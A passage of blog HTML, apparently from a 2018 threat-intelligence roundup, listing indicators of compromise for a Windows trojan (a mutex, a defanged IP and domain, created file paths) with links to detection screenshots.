src="https://4.bp.blogspot.com/-tA6vC5fR8Wg/W9yNHyg4tcI/AAAAAAAABGM/SQRvLKA1MJ4U_2S8dwL1z_DROqQ_kLg2QCLcBGAs/s640/5b8a7e111e05c20e9499e8a06ea17582b95ae8c8a780406b6969a40886b614b7_malware.png" width="640" /></a></div><br /><h3>Win.Trojan.Mikey-6735890-0</h3><br /><h4>Indicators of Compromise</h4><br /><b>Registry Keys</b><br /><ul><li>N/A</li></ul><b>Mutexes</b><br /><ul><li>qazwsxedc</li></ul><b>IP Addresses</b> contacted by malware. Does not indicate maliciousness<br /><ul><li>52[.]1[.]22[.]171</li></ul><b>Domain Names</b> contacted by malware. Does not indicate maliciousness<br /><ul><li>www[.]easycounter[.]com</li></ul><b>Files and/or directories created</b><br /><ul><li>%WinDir%\cer61A0.tmp</li><li>%TEMP%\adminpak.msi</li><li>%SystemDrive%\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\C5MZMU22\adminpak[1].exe</li><li>%WinDir%\cluster\clcfgsrv.inf</li><li>%WinDir%\cluster\cluadmin.exe</li></ul><b>File Hashes</b><br /><br /><h4>Coverage</h4><div class="separator" style="clear: both; text-align: center;"><a href="https://2.bp.blogspot.com/-jTB0CZDwsFQ/Wz-6aknWuhI/AAAAAAAAAbc/XPOsdG7hpfQpz9NPUVylIgNETUHICQ5OwCLcBGAs/s320/amp-email-threatgrid-cws-only.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://2.bp.blogspot.com/-jTB0CZDwsFQ/Wz-6aknWuhI/AAAAAAAAAbc/XPOsdG7hpfQpz9NPUVylIgNETUHICQ5OwCLcBGAs/s320/amp-email-threatgrid-cws-only.png" /></a> </div><br /><h4>Screenshots of Detection</h4><b>AMP</b><br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://4.bp.blogspot.com/-ZcPwrtqkwvA/W9yNYeBgclI/AAAAAAAABGo/EqYoWehoASk7HE5gRAtxc0MNcazfDW8kwCLcBGAs/s1600/9d267ed7cc3efe21afd96a3717cf920376048528e7094c54defb915afbe96a80_amp.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="481" data-original-width="702" height="272" src="https://4.bp.blogspot.com/-ZcPwrtqkwvA/W9yNYeBgclI/AAAAAAAABGo/EqYoWehoASk7HE5gRAtxc0MNcazfDW8kwCLcBGAs/s400/9d267ed7cc3efe21afd96a3717cf920376048528e7094c54defb915afbe96a80_amp.png" width="400" /></a></div><br /><br /><b>ThreatGrid</b><br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://3.bp.blogspot.com/-646QP_YocxI/W9yNeGnBUtI/AAAAAAAABGs/lRZETrRD898Zs3fkcQps8ToOjS3T3Jb3ACLcBGAs/s1600/9d267ed7cc3efe21afd96a3717cf920376048528e7094c54defb915afbe96a80_tg.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="801" data-original-width="962" height="532" src="https://3.bp.blogspot.com/-646QP_YocxI/W9yNeGnBUtI/AAAAAAAABGs/lRZETrRD898Zs3fkcQps8ToOjS3T3Jb3ACLcBGAs/s640/9d267ed7cc3efe21afd96a3717cf920376048528e7094c54defb915afbe96a80_tg.png" width="640" /></a></div><br /></div>2018-12-13T14:24:04.692-05:000https://blog.talosintelligence.com/2018/11/threat-roundup-1019-1102.html